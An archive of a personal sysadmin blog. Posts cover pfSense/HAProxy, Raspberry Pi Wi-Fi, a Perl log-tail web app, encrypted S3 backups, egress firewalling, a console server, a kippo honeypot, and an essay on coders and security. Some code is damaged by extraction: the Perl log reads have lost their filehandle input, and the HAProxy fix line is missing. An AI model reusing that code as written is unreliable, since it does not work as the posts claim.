ctrl-alt-del.cc

Fixing HAProxy configuration in pfSense

2012-05-19T15:03:54Z

Some time ago I was experimenting with pfSense and HAProxy to deploy both as firewall and load balancer for one of the websites I was working on at the time. The key incentive was that pfSense is great BSD based firewall distribution with amazing features offered out of the box, and if that was not enough, you can install additional packages to add features you need.
One of those packages is HAProxy (proxy/load balancer) and both work together very nicely but...

Problem
I have installed pfSense with HAProxy several times, more than several in fact... and every time I did it, the configuration file generated using HAProxy web configurator (integrated with pfSense interface) was broken. First row in the table showing defined backends was empty - the configuration file itself had just variables but no values. The second entry was just fine... Obviously HAProxy refused to start.

Quick fix
Just so I remember next time what I did. Get shell on pfSense console or install file manager package and edit /usr/local/pkg/haproxy.inc to add the line highlighted below:

Not a rocket science, just shift() the first (empty) backend definition and let the script do the rest.

Note
Manually fixing config file is pointless because new config is generated every time HAProxy (re)starts and the code above is used to generate it.

Raspberry Pi meets Edimax EW-7811Un wireless adapter

2012-05-08T21:49:56Z

This post contains my notes - what I did to make it work properly, so next time I build the system, I have a step by step guide. In case you lived under the rock for the last months and don't know what Raspberry Pi is, you should visit www.raspberrypi.org now.

I bought Edimax EW-7811Un adapter for my Pi - small factor, b/g/n type, so why not... especially when vendor says it provides Linux drivers (wohoo!). Sadly as it turns out, compiling drivers on x86 or x64 and ARM architectures can be totally different experience - especially with Raspberry Pi being in it's software infancy. In all seriousness - Pi is for those that like to solve problems (at least at the current stage), but the community works hard to catch up very quickly - great stuff!

]]> The wireless adapter

Under the hood, EW-7811Un runs Realtek's rtl8192cu chipset. Kernel module for this chipset is actually included in Debian 6 image (19-04-2012) distributed via Raspberry Pi website, but it will not work with the card. This is for device with USB ID 7392:7811 - there may be other hardware revisions that will.
Actually after the whole procedure described here, running lsusb shows totally different chipset

EW-7811Un 802.11n Wireless Adapter [Realtek RTL8188CUS]

so I'm not sure which one it really is... and to be fair, I don't care - it works :-)

Debian6-19-04-2012 image

Debian image is really nice to start with but it has some issues. Maybe I'm purist but working for some time with ARM devices I learned to value resources they offer. I was a bit surprised how many unneeded things were turned on by default and that SSH was actually disabled. We will get those things fixed a bit further down...

Putting the bits together

I had to change the procedure a bit, because the whole system wasn't very stable. I was getting a lot of kernel panics and segfaults that were causing Pi to freeze (read hang up) all the time. First suspicion was power supply (I use iPhone PSU - it's rated 5V/1A) but it turned out to be firmware/kernel issue it seems, so we start with fixing it first. Some of the steps below (especially firmware part) were found on the Raspberry Pi forums in thread about XBMC so kudos to their authors - you guys rock!

Firmware:

Start with debian6-19-04-2012 image
Download the latest firmware from GitHub - I used revision a8f8d24
Copy all files from firmware/boot to /boot
Replace /opt/vc with firmware/opt/vc
Replace /lib/modules/3.1.9+ with firmware/modules/3.1.9+
Download the latest tools from GitHub - I used revision 3aba47b
Copy arm-bcm2708/linux-x86/arm-bcm2708-linux-gnueabi/sys-root/lib/libstdc++.so.6.0.14 from https://github.com/raspberrypi/tools to /usr/lib and run: sudo ldconfig

Now the wireless part:

Download the compiled driver module from here, unpack and move to /lib/modules/3.1.9+/kernel/net/wireless/
Run: sudo depmod -a
We need to block the kernel module that comes with Debian image - edit /etc/modprobe.d/blacklist.conf and add the following line: blacklist rtl8192cu
We want the new module to always load on boot, regardless of hardware being present or not - edit /etc/modules and add the following line: 8192cu

Automatically connect to WPA2 network at boot - no GUI needed:

Configure wpa_supplicant - edit /etc/wpa_supplicant.conf:

ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="MyWPA2wifi"
    scan_ssid=1
    proto=RSN
    key_mgmt=WPA-PSK
    pairwise=CCMP
    group=CCMP
    # to get encoded PSK run: wpa_passphrase
    psk=
}

Make interface come up automatically - edit /etc/network/interfaces:

auto wlan0
iface wlan0 inet dhcp
pre-up wpa_supplicant -Dwext -i wlan0 -c /etc/wpa_supplicant.conf -B

Various fixes for Debian6-19-04-2012 image

Enable SSH at boot if you need it (I do, very much):

sudo update-rc.d ssh defaults
or rename boot_enable_ssh.rc to boot.rc and reboot - this file is on FAT partition so you can do it even under Windows

Broken /etc/apt/sources.list - apt-get complains about duplicate sources, easy to fix - debian sources should be in one line, not two:

deb http://ftp.uk.debian.org/debian/ squeeze main contrib non-free

Disable services you possibly don't need (I know I don't) but come enabled by default:

sudo update-rc.d -f portmap remove
sudo update-rc.d -f nfs-common remove
sudo update-rc.d -f xinetd remove

Fix NTP drift file location permissions - Raspberry Pi doesn't keep time (no battery) so it syncs with NTP after every boot:

sudo chown root:root /var/lib/ntp

Summary

Raspberry Pi boots up, brings up wireless interface and connects to the network. After firmware update I have not seen a single kernel panic or segfault yet, which is huge change to how my Pi behaved before. Basically it was dying on any operations that required some more wifi network use (wget was enough), more CPU and/or more RAM... and having 192MB of usable RAM (because we share RAM with GPU) made it really common situation.

Enjoy!

Standard disclaimer - it works for me!

Logfile tail the web way

2012-03-04T01:47:50Z

Recently I needed something like web based equivalent of tail -f and tail -n commands, so I could display running tail or last N lines from specific log file. To avoid reinventing the wheel I started looking at previous works on-line and found some interesting bits here and there - one of the most useful being AJAX Logfile Tailer & Viewer, so I based my work on this one.

The trick is, that as far as it does exactly what I needed, this solution requires web server with PHP... and installing web server (not to mention PHP) is not really what I want on my logserver.

Mojolicious to the rescue!

Mojolicious is a very powerful Perl web framework that comes without bloat (almost unheard of these days!) - all you need is standard Perl interpreter and core Perl modules as they come preinstalled with your Linux distro and you can install Mojolicious - no other dependencies. On Debian systems installation is as simple as

apt-get install libmojolicious-perl

and we're up and running. Writing Mojolicious::Lite app is really simple and the best part is that it comes with it's own, built in web server (operating in several different modes if needed). Sounds like nice way to go - no dedicated web server on the machine, self-contained application, etc. One more thing - writing, testing and deploying the whole code to actual machine took less than 10 minutes!
]]> Implementation details

I decided to take HTML and JavaScript elements from the AJAX Logfile Tailer & Viewer as they seemed to do just what I need and because JavaScript is just not my cup of tea so certainly, I wouldn't write it myself.

All of the code is written as Mojolicious::Lite app, with HTML and JavaScript stored as embedded templates (see DATA section of the script), so all I need to run it is Mojolicious and the script itself - nice, portable solution with low memory footprint when running. Yes, I could use Web Sockets, Comet or any similar technology (Mojolicious supports those out of the box anyway) but I didn't have time to play with it right then - I needed something that will work.

Note to all Perl purists - I know you won't like the code because I call external (system) tail command to get log lines, but I didn't have time and honestly was too lazy to write it in pure Perl - will fix that in v2.0.

To keep code listing short, I'll put placeholders for HTML and Javascript elements.

#!/usr/bin/perl
use strict;
use warnings;
use Mojolicious::Lite;
use HTML::Entities;

# logfile we want to see
my $logfile = '/var/log/syslog';

# Route requests to templates in DATA section
get '/' => 'index';
get '/js/ajax.js' => 'ajax';
get '/js/logtail.js' => 'logtail';

# RESTful interface - fixed tail size
get '/logdata' => sub {
    my $self    = shift;
    open (IN, "tail -40 $logfile |");
    chomp(my @log = ());
    close (IN);
    map { $_ = encode_entities($_) } @log;
    $self->render(text => join("\n", reverse @log));
};

# variable tail size
get '/tail-n/:N' => sub {
    my $self = shift;
    my $N = $self->param('N');
    if ($N =~ /\D/) {
# command injection attempt?
        $self->render(text => "Y U NO GIVE UP, NICE TRY!");
    } else {
        open (IN, "tail -$N $logfile |");
        chomp(my @log = ());
        close (IN);
        map { $_ = encode_entities($_) } @log;
        $self->render(text => join("
", reverse @log));
    }
};

# cookie encryption passphrase - no use here but if missing it produces warning :-)
app->secret('youcansafelyignorethisone');
app->start;

__DATA__
@@ index.html.ep

@@ ajax.js.ep

@@ logtail.js.ep
/* an ajax log file tailer / viewer
copyright 2007 john minnihan.

http://freepository.com

Released under these terms
1. This script, associated functions and HTML code ("the code") may be used by you ("the recipient") for any purpose.
2. This code may be modified in any way deemed useful by the recipient.
3. This code may be used in derivative works of any kind, anywhere, by the recipient.
4. Your use of the code indicates your acceptance of these terms.
5. This notice must be kept intact with any use of the code to provide attribution.
*/

That's it! Keep in mind that you have to customize a bit logtail.js.ep part - function getLog has url variable you need to point to /logdata provided by our script. You can also specify how often the AJAX call will be made to fetch log data - this is done in startTail function. I use 2000ms value and it's well enough, if not too often anyway - tune it so you won't get more than 40 lines in the log during this time... or tune for the maximum smoke - your call.

How it works?

Built-in web server will respond to all paths defined with get '' statement. Those that are routed to templates, will respond with templates (which can have dynamic content as well but that's out of scope here). Those with defined subroutines will get the code executed - no magic here.

Index page pulls in two JavaScript files (all template based), logtail.js requests data from first subroutine responsible for '/logdata' and this one is refreshed as per timer in startTail function.

Second subroutine is used to display static log chunk that won't refresh itself automatically - in case you are debugging something, the last thing you want are disappearing logs. This one is manually called by the user as http://scrpt_url/tail-n/. Just in case someone had the idea to run script as root (command injection could be deadly!) the script will terminate if provided number of lines contains non-digits.

Running the app

You can run it in many ways, but for small deployments (like mine) this is entirely enough:

./webtail-ajax.pl daemon

This will start listener on port 3000 (default, can be changed with command line parameter).

Security warning

Logs can contain data that is not safe to be displayed via web interface as-is - think of XSS for example. At best, you will get popup, at worst... well, much worse. This is why I've added encode_entities() from HTML::Entities to the script - current version escapes at least the basic elements but you can decide which ones you want to encode - see module documentation for details.

Credits

Big thank you goes to Sebastian Riedel (@kriah) for his work on Mojolicious which simply rocks and John Minnihan who wrote the HTML and JavaScript I used... as well as and many others that gave me some ideas but the approach they proposed was sadly not acceptable in my usage scenario.

Secure backup of untrusted remote hosts

2012-02-23T22:06:15Z

I didn't blog for a long time, so it will be a long post caused by some nightmares I had about not doing proper backups on some of my hosts.

Servers - all those small and big machines most of the geeks own, run or operate. As VPS pricing drops, we see more and more of those low-end, resource strapped servers. Organic growth usually means you start with empty server, some kind of definition what it will be doing and... from there it just goes downhill. How do you backup such VPS? Here is something I use myself.

My backup requirements

Automated - it has to run without supervision in roughly regular time intervals, if it's not automated it will never be done (read no backup)
Off-site - in case I loose the whole machine for some reason (because RAID is not backup and what fire doesn't destroy, water poured by firemen will)
No Cross-Backups - because they require trust relationship between machines and if you think about using cheap VPS'es for cross-backups, remember that you get what you pay for!
Automatically delete old backups - to save space, (my) time and money
Append only - machine can only write data to its own, designated backup volume but can not delete or modify other volumes (accidents and rogue users do happen)
Confidentiality - no unauthorized access backed up data
Availability - storage volume has to be highly available so I can not only write to it knowing it's there, but also access backups when I need them
Access controls - ability to define granular access rules and enforce append-only usage
Economy - it has to have reasonable cost

]]> Proposed solution

Server creates tarball with files I want to copy using simple shell script triggered from cron. File created is encrypted with GnuPG using the key of my backup user and the private key is stored off-line. Encrypted file is uploaded to off-site storage volume.

As I used Amazon AWS before, this was my first choice. The company is big enough to do quality job, offers all the building blocks and pay-per-use is just what I need. By combining together services from Amazon I can satisfy most of the requirements out of the box and easily add what is missing.

Amazon S3 is a storage solution that allows you to put your files into 'buckets' (think file shares) with globally unique names. Each bucket has series of properties - for example geographical location, so you can select where your data will reside (thinking of legal stuff and price differences across locations), object expiry time which will be our auto-delete mechanism for old data and finally ACLs. Because those ACLs are not enough for what I want to do (or rather how I want to have it done) I will be using IAM service that nicely integrates with S3 and many other AWS services, so let's get it set up.

Setting up S3

I create separate S3 bucket for each host, so I can select location and different expiry times easily. I decided to name buckets after hosts's FQDN and add '-backups' suffix, so for this blog post I have bucket called aws-poc.home.lab-backups. In bucket properties we are interested in the object expiry time configuration. Simply add the rule as seen below. If you leave prefix empty, it will affect all objects in the bucket - which is exactly what I want - retain backups for 180 days.

IAM configuration

Uploading to S3 via web service requires providing user's Access Key ID and Secret Access Key. For each server I want to back up I need separate IAM user - this will allow me to tell them apart and revoke access to backup bucket if needed. IAM allows us to grant every IAM users and groups right to perform or deny certain actions, like 'allow to upload files only to bucket X, block all other bucket operations' - we do that below.

After creating the user in IAM service (yes, IAM, not S3), remember to write down the access keys - they can't be displayed later - you will have to generate new keys (see user properties).

Now we need to define what the user can do. In user properties under Permissions tab, we select Attach User Policy and choose Policy Generator. To have append-only access to our S3 bucket we need to grant user access to PutObject action (and only this one) and specify ARN of our S3 bucket. This is the minimum we need to do.

Backup and upload scripts

Backups scripts are really easy - just tar and gzip directories as needed so they contain what is to be backed up, pipe that via gpg and save somewhere for a short time... Then upload to S3 and you can delete original encrypted tarball. For example it can be done this way:

#!/bin/bash
#
# this is updated version that adds file hash to the name
# so once file was uploaded and source data changed,
# potential attacker can't overwrite files already uploaded
#
WORKDIR=/tmp
DATE=`date +%Y%m%d`
HOSTNAME=`hostname --fqdn`
cd $WORKDIR
tar cf - /etc /var/backups 2>/dev/null | bzip2 -9 | gpg -e -r backups > tmpbackup
SHA256=`sha256sum tmpbackup | awk '{ print $1; }'`
BACKUPFILE=$DATE-$HOSTNAME-$SHA256.tar.bz2.gpg
mv tmpbackup $BACKUPFILE
s3upload.pl $HOSTNAME-backups $BACKUPFILE && rm $BACKUPFILE

That's all - the upload is done by s3upload.pl script:

#!/usr/bin/perl
use strict;
use warnings;
use Net::Amazon::S3;

# requires:
# apt-get install libnet-amazon-s3-perl libwww-perl libxml-simple-perl

if ($#ARGV < 1) {
    print "Usage:\n\t$0 \n";
    exit 1;
}

my $s3 = Net::Amazon::S3->new({
    aws_access_key_id => "INSERT KEY ID HERE",
    aws_secret_access_key => "INSERT SECRET KEY HERE",
});

# upload or die
my $bucket = $s3->bucket($ARGV[0]);
$bucket->add_key_filename($ARGV[1], $ARGV[1]) or die $s3->err . ": " . $s3->errstr;
exit 0;

Caveats

To run gpg in the way I do above, importing the target key is not enough - you have to edit the imported key and set trust level to ULTIMATE or every time the script runs, you will have to interactively confirm that you are sure you want to encode data.

To change trust level for the above key I did:

gpg --edit-key backups
trust
5 <== for ultimate trust
quit

That's all, now the key has ultimate trust and the process can be fully automated - no more questions asked.

Closing notes

The old saying says there are two kinds of people - those who do backups and those who will do backups. In fact there is a third kind - those who test their backups... so please, test your backups, see if you can restore data, or otherwise you have just wasted your time and money to buy false sense of security.

UPDATE:
As the PutObject permission allows to overwrite already existing files, it's desirable to have unique file names that can't be easily determined/guessed. I have updated the backup script above to have to so calculate SHA256 hash of encrypted backup file and add resulting hash to the file name. This is just a result of my paranoia - better be safe than sorry :-)
Another update is for s3upload.pl - it is more generic right now, taking two parameters - bucket name and file name from the command line passed as parameters, so you can use it as well for uploading other things than backups and it will work ok.

How To Outrun A Lion?

2011-02-17T09:26:56Z

You don't have to outrun a lion - it's enough you outrun the guy running next to you.

Funny enough, the same stands for securing your IT infrastructure - if you are in the "low hanging fruit" category, you get owned for sure - possibly before you even notice anything shady going on behind your shiny website. When you raise the bar a bit and step out of the damned circle, most of the attackers will give up on you and move to find some other target that is easier to compromise.Of course that doesn't work for determined attackers that want YOU and nobody else, but that's a story for another time.

What's that smell?

It's a smell of FAIL my friend...

Just recently I was helping two of my friends and doing some forensics on their servers (or rather on what was left out of them) after they noticed something strange was going on. Long story short, the key part is that the attackers owned those boxes for months before they were discovered. They got in via path of the least resistance - badly written PHP web apps (there's so many of them!), dropped c99 or similar shell and owned the box to their liking.

In general, we suck really bad if it takes us months to detect such hacks.

Here come the benefits of scale

Wherever and whenever I look at any shared hosting providers, dedicated servers and alike, their default configuration is wide open by default. As long as the box is on-line and Nagios doesn't report issues, nobody is actually checking what's going on that box. Basically operators don't care - they provide functionality and they charge you for it. Oh yes, that's exactly what they do - charge you first and then provide a ton of stuff you don't need and don't use - unless you are an attacker that is :-)
]]>
Default configs are similar to default passwords.

Improving security posture

If you are on a shared hosting platform, there's not much you can do really. It's a shared host, so you (or rather the operator) has to find the common denominator - something that will satisfy everybody using this particular host. It's about finding the weakest link and bringing everybody else down to the same level - not good.

If you go with VPS or dedicated server, you can change a lot and it won't cost you a lot of money. Simple things can improve your posture and make it much harder for the attackers to run loose on your servers. Here are just three things you can do for free...

Egress filtering

Do you have an outbound firewall policy set to DROP by default? Can you imagine that in datacenter environment? Can it work well or will be a huge PITA?

Yup, easily doable and not that painful if you think about it. If we consider Linux, you can use iptables for that and I guess you already do have an iptables firewall of some sort that filters inbound packets. Let's extend it a bit - example below is for a simple web server:

# fail close - just in case
/sbin/iptables -P OUTPUT DROP
/sbin/iptables -F OUTPUT

# allow responses - majority of traffic comes here so it's a first rule
/sbin/iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# allow from self to self
/sbin/iptables -A OUTPUT -d 127.0.0.1 -j ACCEPT

# allow DNS servers listed in /etc/resolv.conf
for DNS in `grep "^nameserver" /etc/resolv.conf`; do
        if [ $DNS != "nameserver" ]; then
                /sbin/iptables -A OUTPUT -p udp --dport 53 -d $DNS -j ACCEPT
        fi
done

# allow SMTP out to email admins
/sbin/iptables -A OUTPUT -p tcp --dport 25 -d $DOMAIN_MX -j ACCEPT

# allow NTP outbound, local NTP is nice to have!
/sbin/iptables -A OUTPUT -p udp --dport 123 -d $LOCAL_NTP -j ACCEPT

# allow connections to our Linux repository mirror for updates
/sbin/iptables -A OUTPUT -p tcp -d $LINUX_REPO -j ACCEPT

# generic log and drop all
# /etc/syslog.conf => kern.=debug     /var/log/firewall
/sbin/iptables -A OUTPUT -j LOG --log-level 7 --log-prefix "FW-DROP: "
/sbin/iptables -A OUTPUT -j REJECT --reject-with icmp-host-prohibited

Simple? Yes!
Does it raise the bar? Yes!
Do I have to write IP addresses everywhere? No - iptables will resolve hostnames used in rules and I've noticed that for example if my $LINUX_REPO has several IP addresses, iptables actually created an entry for each of them.
But I can't do anything else! That's exactly the point - you shouldn't do anything else on a web server, unless there is a justified need for that (say access SQL database on another host, etc).

Wrapping up - all your web traffic (responses from web server and other services hosted here) will go into state matching rule, then you care for DNS, access to your own MX (only this one unless you have very good reason to do otherwise), NTP and distro updates are really nice to have, then drop all the other traffic. You could add rules for remote (off-site) logging, so you know when something tries to call out/pops your box.

Now, when an attacker drops his php shell he is pretty much very limited (no call back home, no portscans, no IRC bots, etc), unless he escalates access to root, but hey - how about a network based firewall implementing above?

Server hardening

Wow, you could write a book on that, but let's stick to the basics:
Install only the software you really really need (do you need that gcc and all dev libraries to run your web server) - remove what was installed and is not needed - you can always put it back if you need it later!
Turn off all services that shouldn't be running - my rule of thumb is to bring the system to the point, where I can run it entirely without any firewall, because there is no services to hide.
Keep your software updated - cron is your friend (to see what updates are available)
Kernel hardening - SELinux and Grsecurity (+RBAC) seem to be the key candidates here. Yes, that can take a lot of time to set up, but in most cases it's well worth it.

Just try to imagine how annoying it has to be for an attacker to own the box via web app, get root via local privilege escalation and not be able to install his rootkit (and hide) because kernel is monolithic (no loadable modules support) and has grsecurty baked in, with IP logging on resource overstep and other nice features it offers.

BTW here's the funny note left in one of the toolkits I lifted from one of friend's servers - what you make out of it is up to you. Oh... and credit to Ingo MolnÃ¡r for his exploits and awesome comments in their source code ;-)

Logging and monitoring

Best things are free right? How about using syslog that comes with the system to send the logs off-site? Make a small box somewhere and simply pump it all out, so you have an off-site record in case of unwanted guests showing up.
Not enough bandwidth you say? There's an app for that - pump logs out via OpenVPN using LZO compression with or without encryption (hint: you can set the cipher to none) and as my test show, this can drop your logging bandwidth by around 80% and on top of that you can do traffic shaping in OpenVPN itself.

Now, having logs and not looking at them is a waste of resources, unless you are "checkbox security" organization and need it for compliance on paper... Depending on your pocket condition, you can use simple scripts to get what you need or get some free tools that sift through and visualize large amounts of data. For example Splunk has a free edition (up to 500MB raw log input per day) and there is many other (mostly paid for) products that you could use. Even "cloud based" services like Loggly (also offers free developer account) are available these days - simply pick something that works for you.

It is not a rocket science - it's really about common sense, so calm down and carry on.

UPDATE:
As @denishowe pointed out "it seems we need a checklist for dumb providers with the list of things to disable and another checklist for dumb users, so they can enable what they really need" - yes, that might just work :-)

Building cheap console server

2010-11-24T22:15:01Z

This time from the department of almost wasted time...

We all know that serial ports come very handy when you need to (re)configure something like a switch/server/firewall or similar device. In theory you can do that over TCP/IP nowadays with one hint - you need to have connectivity. All would be ok if not the fact that those very switches/firewalls you want to reconfigure actually provide the connectivity you need :-)

The Idea

Now... why spend hundreds of pounds/dollars on off-the shelf kit? Sure, it's cool, properly built and works unless you mess it up, but where's the fun part?! Today I needed a very very quick and cheap solution, so:

SheevaPlug - Â£114.00
13-port USB hub - Â£19.99
USB-serial dongles (pl2303) - Â£14.99 each

This way I have fully networked console server with 4 ports just under Â£200 - acceptable, especially when the whole thing is running off DHCP and calls home via OpenVPN - very easy to deploy!

Tricky bits

Generic Sheeva has one USB host port and hub has 13 of them - I want to send it off to remote location and have somebody plug it in and not mess up what's where. Trick is to write appropriate udev rules to detect adapters and give them ttyUSBn names according to physical port on the hub.

All would be fine and easy if it worked as documented - sadly it doesn't. First problem was that ATTRS{devpath} (as returned by udevadm info --attribute-walk -n /dev/ttyUSBn that allows to distinguish usb ports) was used by rule in tests but wasn't propagated properly on none of my Debian or Ubuntu boxes. Then I tried to match KERNELS for parent devices - nope... if you go too far up the tree it doesn't see s**t :-/
]]> The Solution

Finally I got the working rule set - long story short, here it is:

KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.1:1.0", NAME="ttyUSB0"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.1:1.0", NAME="ttyUSB1"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.2:1.0", NAME="ttyUSB2"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.3:1.0", NAME="ttyUSB3"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.4:1.0", NAME="ttyUSB4"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.4:1.0", NAME="ttyUSB5"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.3:1.0", NAME="ttyUSB6"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.2:1.0", NAME="ttyUSB7"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.1:1.0", NAME="ttyUSB8"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.4:1.0", NAME="ttyUSB9"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.3:1.0", NAME="ttyUSB10"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.2:1.0", NAME="ttyUSB11"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.1:1.0", NAME="ttyUSB12"

I had to use KERNELS match as above to have variables seen by the rule. I still don't know (and at this moment don't care any more) why it didn't work as documented...

The bottom line is that it works, it can be done way cheaper than commercial solutions, literally at the fraction of cost - if you don't mind the spider-ish look of it :-)

Update:
Hat tip to @herkii for pointing out another approach.

Making new friends with kippo

2010-07-31T01:59:22Z

Less than two weeks ago I've sent a tweet asking for honeypot recommendations. I wanted to play a bit with something new, something I never did before, mostly because I never had time for it (right, like I have it now). Anyway, thanks to all the great people that replied to my tweet I've learned a lot and found some great software. Now it's time to give something back to the community.

Kippo - simply amazing

First honeypot I've reached for was kippo. It is a medium interaction SSH honeypot designed to log brute force attacks and log the whole session as it goes - including timings, typos, etc. The magic sauce is that you can play the session back (with typos!) and see what the attackers are made of. Believe me - playing back those session is totally amazing! Some samples are available on project's page.
There are also other features to like, like trapping sessions and not disconnecting them even if bad guys do logout, logging ssh client used (very easy to tell scanning bots apart from real people), quite nice interaction and most of all easy way to extend your honeypot it with your own commands.
]]> Installing kippo

For the base platform I used one of my Debian hosts and started with kippo 0.4. It was good to see how to run it, but options are limited, so go full steam ahead and get SVN version - it is well worth it!

By default kippo runs on port 2222 but I wanted it on port 22 as normal SSH would be (running as unprivileged user), so I've set it up on one of my unused IP addresses - the setup was very easy.

Before you grab the latest version from SVN repo, you should install required python packages (dependencies will be pulled in automagically):

apt-get install python-twisted
svn checkout http://kippo.googlecode.com/svn/trunk/ kippo-read-only

Main benefit of SVN version is that it can use MySQL to log events (alongside the regular log file) and that it can actually bind to given IP address - version 0.4 binds to all available addresses which is a bummer for me when I want to spawn totally fake host and have normal ssh working as well.

Honeypots - rule #1

DO NOT run honeypot as root!

Remember that honeypots are software components, they may (and most likely do) have their own bugs. Of course you have to be root to bind to port <1024, or do you?

Configuration

Couldn't be easier... create unprivileged, regular user account to run your honeypot (I called it honeytrap), create your own kippo.cfg using kippo.cfg.dist as template, set MySQL parameters, honeypot hostname (attackers will see it after they log in), IP address to bind to and port. If you don't want to use MySQL - your call... it may come very handy for reporting. That's it - you are ready to go.

Now the trick is to get it running on port 22. There is obviously more than one way to do it. If you have only one IP address available, you should most likely go to kippo's Wiki page that describes how to make kippo reachable through port 22 but if you have spare IP address... =B-]

Now, how do I bind to port 22 as regular user? Somebody must have solved that problem before, right? Sure, and they even created a package that solves this issue! It's called authbind and it's amazingly easy to use.

apt-get install authbind
touch /etc/authbind/byport/22
chown honeytrap:honeytrap /etc/authbind/byport/22
chmod +x /etc/authbind/byport/22

Authbind works almost like sudo, except for the ports - not the commands. In kippo's directory you will find start.sh script - add authbind in front of the startup command and you are good to go.

Ready, set, go!

Ok - don't do my mistake... test your install - ssh into the honeypit and see if you can log in. The root password is in kippo.cfg. Testing setup is important - if sql database is gone, then you won't log in and in kippo.log it will say that the root password was incorrect, when in fact the problem is disconnected sql log backend.

Observations

Kippo is really great tool to learn what the bad guys are up to. If they add user, they can log in as that user later. If they change root password, it will be there for them when they return. The best part is that of course you can see those passwords and suddenly you will have new 'accounts' added and new, correct and active at the same time root passwords (yes, more than one correct password!).

I've spent some time watching the sessions recorded so far - there's so much to see, laugh and cry, but I'll leave that for another post...

BTW, I blame Andrew (@Infosanity) for all of that - he got me back to honeypots topic, then other great tweeps came back with advice (much appreciated), so make sure to visit his blog ;-)

Coder vs Security - friend or foe?

2010-05-25T10:45:22Z

Certainly 140 characters is not enough to express all the thoughts around recent CSRF flaw in OpenCart and how it was handled (in my humble opinion it even deserves nomination for Pwnie Awards), although some people had a good go at Daniel Kerr.

Above is just a selection of comments that you can find on Twitter and in all of this negative karma there is some good thing going on. This incident got quite a lot of people to write some really good posts about the incident. Some of my favorite posts are Humble Helps and Psychology of "Secure Code" - definitely worth reading.

Although I'm not an expert in either coding or security (but I did quite a lot of both) I think there is also a bit more to it.
]]> I used to work with many coders (people that write code) - some extremely good and some extremely bad. When I look back I would happily say that I was at some point doing a bit of both - at least in my own opinion.

Developers vs code-slingers

There is a significant distinction between those two groups at least as far as I can tell. Developers do their job and write apps the best way they can, they are proud of their job because they know they did the best they could. Code-slingers, well... get it done, whatever... Usability is something they may or may not understand (if it works, it's usable, right?), quality and elegance rings the bell somewhere but that's not in their church so nothing to worry about... and security is often totally unheard of. Sad, isn't it?

I think we've all been there and done more or less of that - it takes time to learn and even more time to understand. That requires patience and a lot of energy, and more than anything it requires a person to say "I want to do it right, I want to understand".

Recently in one of the emails I've found an anonymous quote by a person that was training newly hired staff - he said "I can teach them just about anything, but I can't give them a basic
sense of curiosity". I couldn't describe it better!

Developers vs Infosec

In my opinion the real virtue of a good developer is aiming for perfection and taking criticism as a chance to improve. It is sometime painful (I know from my own experience) but we all make mistakes and no matter how good we are, there will be someone better that will prove we are wrong. Real developers know how to deal with it because they want their code to be beautiful in all possible aspects and they are curious people. Some of those can be real inspiration and you enjoy every second you spend with them.

Code-slingers vs Infosec

Mostly not as skilled as developers, often with bad habits, etc - you can say 'developers in training' and that is ok. The first shock of getting something that actually does the job is hopefully passing by and they want more - or they don't... they are so happy that their code works that nothing else matters - that's where the problems come from.

It's not a problem of skill, it's a problem of attitude. You can spend a lot of time with them trying to explain, demonstrate or even send to some training that deals with secure coding... still they couldn't care less - oblivious, ignorant, often arrogant and portraying you (the infosec person) as their biggest enemy because you prevent them from doing their job. Yes, I've been there and worked with such people.

Free vs 'for money'

Your options vary depending on environment. In 'for money' space you have tools to deal with that - you can and should mentor such people to help them understand. Sometimes a cup of coffee, friendly chat at the whiteboard going through the requirements and proposed solutions or ideas can really make huge difference. If you are not so friendly then get your company to pay for some good training that will give those people some good base to do their work (get rid of bad habits, don't post code snippets on forum with URL to the product, etc) so they get the carrot.
If that doesn't help, go for the stick - at the end of the day, that code-slinger or his/her supervisor or their supervisor will have to face a dilemma of signing off a code for production - it's a business decision. If you can't block it and don't communicate your security concerns it will be your fault if things go wrong and your head on the chopping block. Brutal but simple - isn't it?

In the free software world, where coder does something for little money (let's say donations) or no money at all, what is the carrot and what is the stick? If people care, they get good ratings, maybe more donations, good publicity and are praised for their work, but if they don't give a s**t... Oh, hi Daniel!

Free software users will complain, do a lot of bad PR and a lot of them will go away migrating to other products, but hold on... in this particular case THERE IS a commercial support for OpenCart. What will the paid customers do with such response like we've seen? How do they feel? They pay for support that they clearly don't get :-(

Lessons to take away

If you are so called code-slinger try to understand that writing code that works is not all you have to do. You should create solutions - not problems. Don't behave like a little kid, put your pride aside for a few minutes and listen to what people have to say about your work - it really helps, even if it will ruin your day.

If you are developer, please, be a mentor to the code-slingers so they understand the beauty of the code and what it is all about. Be a role model - calm, patient, their best friend and inspiration - that's how miracles happen.

If you are the infosec person please remember that saying 'no, you do it wrong' doesn't get you anywhere. You have to be patient more than ever, explain why you said 'no' and help find a solution - otherwise you have just created another problem.

Whoever you are - remember that people sometimes get frustrated, they have a bad day, they say things they later regret - it's a design flaw we all have. Daniel had just demonstrated it and it got public. Simple 'sorry' can clear the atmosphere and create a place to work together and solve the problem.

At the end of the day, we should all be friends, not foes... so I'll better shut up before I say something I will regret :-)

RTFM - there's and app for that

2010-03-24T14:31:06Z

